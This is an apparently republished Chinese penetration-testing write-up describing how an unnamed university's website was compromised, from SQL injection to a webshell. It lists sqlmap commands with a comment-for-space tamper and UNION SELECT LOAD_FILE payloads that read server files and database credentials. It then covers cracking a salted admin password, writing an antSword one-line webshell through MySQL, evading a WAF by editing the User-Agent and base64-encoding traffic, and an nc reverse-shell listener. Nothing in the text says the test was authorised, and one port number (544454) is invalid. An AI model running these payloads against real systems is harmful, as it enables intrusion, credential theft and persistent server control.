记一次某大学sql注入到getshell - 渗透测试中心
2022-1-19 23:8:0 Author: www.cnblogs.com(查看原文) 阅读量:48 收藏

0x04 总结

1.目标系统中加单引号报错,但是过滤空格,可以用/**/代替绕过

2.使用sqlmap中的space2comment.py脚本进行注入

python sqlmap.py -u http://ip/newform.php?id=123  --batch --tamper=space2comment.py –dbs  //读取数据库名

python sqlmap.py -u http://ip/newform.php?id=123 --batch --tamper=space2comment.py --is-dba   //查看是否为dba,该系统是dba权限

3.通过NAMP扫描,目标系统是freedb(sunos也可以),可以同构load_file()函数直接遍历目录

3.通过load_file()函数逐渐读取目标系统目录

http://ip/newform.php?id=123/**/union/**/select/**/1,LOAD_FILE('/'),3,4,5,6,7,8

3.读取到网站根目录

http://ip/newform.php?id=123/**/union/**/select/**/1,LOAD_FILE('/home/db/www/'),3,4,5,6,7,8

4.写入webshell失败,尝试读取数据库配置文件。显示了网站的数据库的用户名和密码

http://ip/newform.php?id=123/**/union/**/select/**/1,LOAD_FILE('/home/db/www/ncuoga/cbg/oga/newsform.php'),3,4,5,6,7,8

5.继续通过LOAD_FILE目标遍历,发现在根目录下存在pmbp数据库管理的页面,通过读取到的数据库和用户名和密码,登录pmbp数据库管理员页面,但是显示空白不能跳转到后台管理页面,直接访问数据库管理页面。

6.查询SQL语句查询权限,显示空置,并没有对写入进行限制

show VARIABLES LIKE "secure_file_priv"

7.但是通过mysql的log写入shell,是不成功的,可能对写入的目录权限有限制。

8.通过目录扫描,找到目录系统的后台管理,这里的后台用户名和密码,可通过sqlmap直接读取出用户名和密码hash

,密码hahs直接通过md5进行成功解密,不能成功登陆到系统,可能密码不对。

9.通过load_file()函数读取后台管理页面,发现密码是加盐的,这里加盐再解密得到正确密码,并成功登陆到目标后台

10.在后台的资料管理的照片处,可直接上传图片,并显示图片的绝对路径地址。

11.参数通过mysql将蚁剑一句话写入到图片的绝对路径地址下。可成功写入

12.通过蚂剑连接一句话,但是显示连接不成功,可能被WAF拦截了,这里需要修改蚂剑的User-Agent,以及使用编码器baa64的编码绕过WAF拦截,并成功链接。

修改antSword-master/modules/request.js和antSword-master/modules/update.js两个文件的User-Agent后成功,并使用码编码bas64

13.通过nc进行反弹,发现反弹失败,发现目标系统禁止出站IP、禁止tcp协议出站端口,并发现出站端口为访问外网,查询网络连接发现54454端口可以出站。

nc -lvvp  544454 



文章来源: https://www.cnblogs.com/backlion/p/15824599.html
如有侵权请联系:admin#unsafe.sh